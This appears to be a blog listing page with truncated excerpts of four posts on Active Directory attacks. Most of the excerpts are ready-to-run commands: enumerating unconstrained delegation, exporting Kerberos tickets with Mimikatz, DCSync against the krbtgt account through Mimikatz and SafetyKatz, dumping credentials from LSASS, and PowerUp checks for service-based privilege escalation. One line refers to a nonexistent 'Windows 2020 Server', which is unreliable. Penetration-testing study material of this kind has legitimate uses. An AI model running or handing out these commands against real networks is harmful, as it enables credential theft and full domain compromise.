Press ESC to close

Ad Attacks
1 Min Read

Methodology Enumerate computers with Unconstrained Delegation Get-NetComputer -UnConstrained Check if a token is available and save to disk Get admin token After compromising the computer with UD enabled, we can trick or wait for an admin connection Invoke-Mimikatz -Command ‘”sekurlsa::tickets /export”‘ Reuse of the DA token…

Ad Attacks
1 Min Read

Steps to execute: # Invoke-Mimikatz Invoke-Mimikatz -Command ‘”lsadump::dcsync /user:us\krbtgt”‘ # SafetyKatz SafetyKatz.exe “lsadump::dcsync /user:us\krbtgt” “exit” # SafetyKatz Old (For Windows 2020 Server) SafetyKatz_old.exe “lsadump::dcsync /user:us\krbtgt” “exit”

Ad Attacks
1 Min Read

1. Mimikatz Dump credentials on a local machine using Mimikatz Invoke-Mimikatz -Command ‘”sekurlsa::ekeys”‘ 2. SafetyKatz Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz) SafetyKatz.exe -Command “sekurlsa::ekeys” “exit” # SafetyKatz Old (For Windows 2020 Server) SafetyKatz_old.exe -Command “sekurlsa::ekeys” “exit” 3. SharpKatz Dump credentials Using…

Ad Attacks
1 Min Read

PowerUp Get services with unquoted paths and a space in their name. Get-ServiceUnquoted -Verbose Get-WmiObject -class win32_service | select pathname (wmi command/lists all paths) Get services where the current user can write to its binary path or change arguments to the binary Get-ModifiableServiceFile -Verbose Get…